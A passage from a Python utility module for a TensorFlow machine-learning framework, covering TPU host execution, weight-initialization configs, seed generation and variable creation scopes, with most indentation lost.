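  return CausalSelfAttenPadding(3, tf.float32)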
def outside_all_rewrites(): # pylint: disable=invalid-name
return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
    @py_utils.tpu_host
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
if job in _tpu_device_assignment_dict:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should be called in unit tests only.
def ClearTpuDevice():
global _tpu_device_assignment_dict
_tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
def SetIsEagerMode():
global _IS_EAGER_MODE
assert tf.executing_eagerly(), 'It must be in eager mode when setting this.'
_IS_EAGER_MODE = True
def IsEagerMode():
return _IS_EAGER_MODE
# Maintains a tf.GradientTape stack.
_GRADIENT_TAPE_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GradientTape(*args, **kwargs):
"""Creates a tf.GradientTape and use it for automatic differentiation."""
tape = tf.GradientTape(*args, **kwargs)
_GRADIENT_TAPE_STACK.stack.append(tape)
try:
with tape:
yield
finally:
_GRADIENT_TAPE_STACK.stack.pop()
# The tf.train.ExponentialMovingAverage singleton used by all subtasks in
# multi-task training with ExecutorTpu.
_EXECUTOR_EMA = None
def SetExponentialMovingAverage(ema):
global _EXECUTOR_EMA
assert ema
assert not _EXECUTOR_EMA, 'EMA was set before.'
_EXECUTOR_EMA = ema
def ExponentialMovingAverage():
return _EXECUTOR_EMA
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
session_config.share_cluster_devices_in_session = True
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
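# Illustrative sketch (editor-added example): Flatten/Pack/Transform are thin
# wrappers around tf.nest and compose naturally with NestedMap. The helper name
# is hypothetical.
def _ExampleNestTransform(nmap):
  """Casts every tensor in a nested structure to float32."""
  return Transform(lambda x: tf.cast(x, tf.float32), nmap)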
def ConvertNoneGradientToZeros(xs, dxs):
"""Sanitize dxs so that None becomes zeros appropriately.
Args:
xs: A list of tensors.
dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.
Returns:
A `.NestedMap` same as dxs with None replaced by a zero tensor.
"""
fn = lambda x, dx: tf.zeros_like(x) if dx is None else dx
return Transform(fn, xs, dxs)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
class _Unique:
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper:
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
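# Illustrative sketch (editor-added example): the returned view supports both
# item and attribute access but rejects mutation. The helper name is
# hypothetical.
def _ExampleReadOnlyView():
  view = ReadOnlyAttrDictView({'foo': 1, 'bar': 2})
  return view.foo + view['bar']  # == 3; `view.foo = 0` would raise.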
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
"""A reservoir sampler.
  This class implements reservoir sampling: given a limit of `num_samples`
  retained samples, every item dynamically added to the sampler is kept with
  equal probability (`num_samples` / number of items seen so far).
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
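# Illustrative sketch (editor-added example): with a reservoir of size k, each
# of the n items added so far remains in the sample with probability k / n.
# The helper name is hypothetical.
def _ExampleUniformSamplerUsage(items, k=8):
  """Returns up to k items sampled uniformly from `items`."""
  sampler = UniformSampler(k)
  for item in items:
    sampler.Add(item)
  return sampler.samples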
class RNNCellStateInit:
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
    shape: An array of ints/symbols specifying the shape of the state.
    init: Hyperparameters as returned by one of the static implementations in
      RNNCellStateInit.
    dtype: The dtype of the states. Defaults to tf.float32.
name: A name for the operation. If --stateless_vars_init is set, this name
is used to generate a seed on a per-variable basis. Otherwise, this name
is optional.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
if use_stateless_vars_init():
if name is None:
raise ValueError('InitRNNCellState() requires a `name` argument when '
'--stateless_vars_init is enabled.')
seed = _GenerateStatelessRngSeed(name, init.seed)
init_state = stateless_random_ops.stateless_random_normal(
shape=shape, dtype=dtype, name=name, seed=seed)
else:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
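# Illustrative sketch (editor-added example): a zero-initialized RNN state of
# shape [batch, cell_dim]. The helper name is hypothetical.
def _ExampleInitRNNCellState(batch, cell_dim):
  return InitRNNCellState([batch, cell_dim], init=RNNCellStateInit.Zeros())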
class WeightInit:
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
"""Parameters of this class."""
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Category(scale=2, seed=None):
"""tf.floor(scale * tf.random.uniform(0., 1.0))."""
return WeightInit._Params('category', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def GaussianSqrtFanAvg(scale=1.0, seed=None):
"""tf.random.normal(0, sqrt(2.0 / (in + out)))."""
return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def UniformUnitScalingFanAvg(scale=1.0, seed=None):
"""Same as tf.variance_scaling_initializer() ...
Samples are drawn from a uniform distribution within [-limit, limit], with
limit = sqrt(3 * scale / n)
where
n = max(1., (fan_in + fan_out) / 2).
See tf.keras.initializers.VarianceScaling for details.
Args:
scale: A Python float.
seed: A Python int or None.
Returns:
A WeightInit param.
"""
return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
return (p.method == 'xavier' and
abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7 and p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
device_mesh=None,
tensor_split_dims_mapping=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
if device_mesh is not None:
assert tensor_split_dims_mapping is not None
assert len(tensor_split_dims_mapping) == len(shape)
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define(
'device_mesh', device_mesh,
'A numpy.ndarray describing the topology of a device mesh to partition'
' this variable onto. Each element in the np.ndarray is the ID of a'
' device in the topology. device_mesh and tensor_split_dims_mapping below'
      ' together specify how this weight tensor should be sharded across'
      ' different tpu cores. If None, this variable is not sharded.'
      ' Examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) is a 1d mesh of 8'
      ' devices; np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) is a 2d mesh of 8'
      ' devices.')
p.Define(
'tensor_split_dims_mapping', tensor_split_dims_mapping,
'A list of integers that map each tensor axis to the device mesh axis'
' along which it is sharded. Its length is the tensor rank, and'
      ' split_dims_mapping[i] is the device mesh axis for tensor dimension i.'
      ' Use -1 for tensor dimensions that are not sharded. If the list is set'
      ' to None and a device_mesh is specified, the sharding is treated as'
      ' replicated. A concrete example:'
      ' device_mesh=np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) (mesh shape [2, 4])'
      ' and shape=[x, y, z] (a 3d variable) with'
      ' tensor_split_dims_mapping=[-1, -1, 1]: the third dim of the variable'
      ' is split along the second dim of the mesh, so each split has shape'
      ' [x, y, z/4].')
return p
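# Illustrative sketch (editor-added example): a typical weight configuration
# for a projection matrix; the collection name and helper name are
# hypothetical.
def _ExampleWeightParams(input_dim, output_dim):
  return WeightParams(
      shape=[input_dim, output_dim],
      init=WeightInit.GaussianSqrtDim(),
      dtype=tf.float32,
      collections=['example_collection'])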
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
class _CollectionGetter:
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
if key.startswith('_'):
key = key[1:]
return key.replace('[', '_').replace(']', '')
# Maintain a session for unit tests (initialized in test_utils.py).
_SESSION_SCOPE = ThreadLocalStack()
@contextlib.contextmanager
def UnitTestSessionScope(sess):
_SESSION_SCOPE.stack.append(sess)
try:
yield
finally:
_SESSION_SCOPE.stack.pop()
def GetUnitTestSession():
"""Get the current variable reuse setting."""
return _SESSION_SCOPE.stack[-1] if _SESSION_SCOPE.stack else None
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse existing variables or create new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
_OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
try:
yield
finally:
_OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
return (_OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
if _OPPORTUNISTIC_VARIABLE_REUSE.stack else False)
_VARIABLE_RENAME_RULES = ThreadLocalStack()
# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
"""Get a unique string identifying a task."""
return f'{task.params.name}_{id(task)}'
@contextlib.contextmanager
def TaskCallScope(task):
_TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
try:
yield
finally:
_TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
"""Get the current task call scope."""
return _TASK_CALL_SCOPE.stack[-1] if _TASK_CALL_SCOPE.stack else None
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
_VARIABLE_RENAME_RULES.stack.append(renames)
try:
yield
finally:
_VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _VARIABLE_RENAME_RULES.stack:
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
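# Illustrative sketch (editor-added example): renaming rules are
# (regexp, format) pairs; matched groups are substituted into the format
# string. The scope and variable names below are hypothetical.
def _ExampleVariableRename():
  with VariableRenameScope([(r'^old_tower/(.*)$', 'new_tower/%s')]):
    return GetVariableName('old_tower/conv/w')  # -> 'new_tower/conv/w'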
_LIST_REGEX_DTYPE = ThreadLocalStack()
@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
"""Append the list of (regex, dtype) to override the dtype.
Args:
list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the data
      type of the variable will be changed to the corresponding dtype.
Yields:
scope in which the list of (regex, dtype) is applied.
"""
_LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
try:
yield
finally:
_LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
"""Find the data type for var_name.
Args:
var_name: A string, name of the variable.
Returns:
    The dtype of the first regex that matches var_name, or None if no match is
    found.
"""
for regex_dtypes in _LIST_REGEX_DTYPE.stack:
for regex, data_type in regex_dtypes:
if re.match(regex, var_name):
return data_type
return None
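# Illustrative sketch (editor-added example): dtype overrides apply to the
# first matching regex. The variable name below is hypothetical.
def _ExampleDtypeOverride():
  with VariableListDtypeRegexScope([(r'.*/bias$', tf.float32)]):
    return FindDataType('model/layer_0/bias')  # -> tf.float32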
def GenerateSeedFromName(name):
"""Generate a random seed from a name string.
Args:
name: A string.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
"""Generate a random seed from the current name of the scope.
If running in eager mode, this returns 0.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if not tf.executing_eagerly():
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
return 0
def GenerateSeedFromId(obj_id):
"""Generate a random seed from the id of an object.
  If running deterministically (e.g., in a unit test), generate the seed from a
  fixed unique name instead.
Args:
obj_id: id(object).
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if tf.get_default_graph().seed is not None:
    # We are in a program/test which needs deterministic randomization.
with tf.name_scope(''):
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
md5 = hashlib.md5()
md5.update(np.int64(obj_id))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
"""Gets the number of leading dimensions of `var` marked as combined layers.
Such dimensions represent variables from different layers stacked together,
  e.g., in RepeatLayer, and optimizers (which have shape-dependent behaviors)
  can adjust their behavior based on this information to match the behavior for
  separate layer variables.
Args:
var: A variable.
Returns:
An integer representing the number of leading dimensions.
"""
try:
return var.op.get_attr('_num_leading_dims_for_combined_layers')
except ValueError:
return 0
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
This new dimension will be marked as combined-layers. See also comments for
GetVarLeadingDimsAsCombinedLayers().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
try:
yield
finally:
_VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES.stack
def GetVariableNumLeadingDimsForCombinedLayersContext():
"""Return the number of leading combined-layers dims for CreateVariable()."""
return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < prefix_dims_to_skip:
raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
f'{prefix_dims_to_skip}, larger than the shape rank.')
adjusted_shape = shape[prefix_dims_to_skip:]
if len(adjusted_shape) < 1:
return 1, 1
elif len(adjusted_shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return adjusted_shape[0], adjusted_shape[0]
else:
receptive_field_size = 1
for s in adjusted_shape[:-2]:
receptive_field_size *= s
fan_in = adjusted_shape[-2] * receptive_field_size
fan_out = adjusted_shape[-1] * receptive_field_size
return fan_in, fan_out
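# Illustrative sketch (editor-added example): for a [3, 3, 64, 128] conv kernel
# with no combined-layers prefix, fan_in = 3 * 3 * 64 = 576 and
# fan_out = 3 * 3 * 128 = 1152. The helper name is hypothetical.
def _ExampleFanInFanOut():
  return GetFanInFanOut([3, 3, 64, 128], prefix_dims_to_skip=0)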
_VARIABLE_CREATOR_STACK = ThreadLocalStack().stack
def _DefaultVariableCreator(**kwargs):
kwargs.pop('var_name', None)
kwargs.pop('var_params', None)
return tf.get_variable(**kwargs)
def _GetVariableCreator():
fn = _DefaultVariableCreator
for wrapper in reversed(_VARIABLE_CREATOR_STACK):
fn = functools.partial(wrapper, fn)
return fn
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
"""Yields a context around a variable_creator, used by `CreateVariable()`.
The function must have the following signature::
def variable_creator(next_creator, **kwargs)
The function may delegate variable creation to the next variable creator, or
return its own tf.Variable.
This differs from tf.variable_creator_scope in that tf.variable_creator_scope
modifies a tf.Variable() call while this modifies a tf.get_variable() call. As
the code is migrated to TF2 and tf.get_variable() is deprecated, this may be
upgraded to using tf.variable_creator_scope instead.
This differs from tf.variable_scope(custom_getter=variable_creator) in that
the kwargs passed can be manipulated.
Variable creators are resolved from the outermost towards the innermost.
The innermost variable creator function is tf.get_variable.
The passed in kwargs must conform to what tf.get_variable accepts, with the
addition of `var_name` and `var_params`.
Args:
variable_creator: A variable creator function.
"""
_VARIABLE_CREATOR_STACK.append(variable_creator)
try:
yield
finally:
_VARIABLE_CREATOR_STACK.pop()
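# Illustrative sketch (editor-added example): a creator that pins variables to
# the CPU and delegates everything else to the next creator in the chain. The
# helper name is hypothetical; a similar creator (MaybePinVarsToCpu) is used
# inside _CreateVariableStateful below.
def _ExampleCpuVariableCreator(next_creator, **kwargs):
  with tf.device('/cpu:0'):
    return next_creator(**kwargs)
# Usage: `with VariableCreatorScope(_ExampleCpuVariableCreator): ...`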
def PlaceOnTpuCore(core_id):
"""Returns a VariableCreatorScope that places variables on a given tpu core.
Only applies when running with TPUs.
Does not yet properly support model parallelism.
Args:
core_id: The tpu core id.
"""
def Creator(next_creator, **kwargs):
cluster = cluster_factory.Current()
if use_tpu():
device = cluster.WorkerDeviceInModelSplit(core_id)
elif (
tpu_compat() and
cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
# The job is running in a fleet that uses tpu, but does not itself have
# access to the tpu, e.g. controller job. In this case, the returned
# device needs to be the cpu device on the tpu host for the given core.
# FIXME: the current implementation is wrong for large values of core_id.
device = cluster.ListDevices(cluster.params.worker)[0, 0]
else:
device = ''
with tf.device(device):
return next_creator(**kwargs)
return VariableCreatorScope(Creator)
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
if use_stateless_vars_init():
return _CreateVariableStateless(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
else:
return _CreateVariableStateful(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
def _CreateVariableStateful(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateful RNGs according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
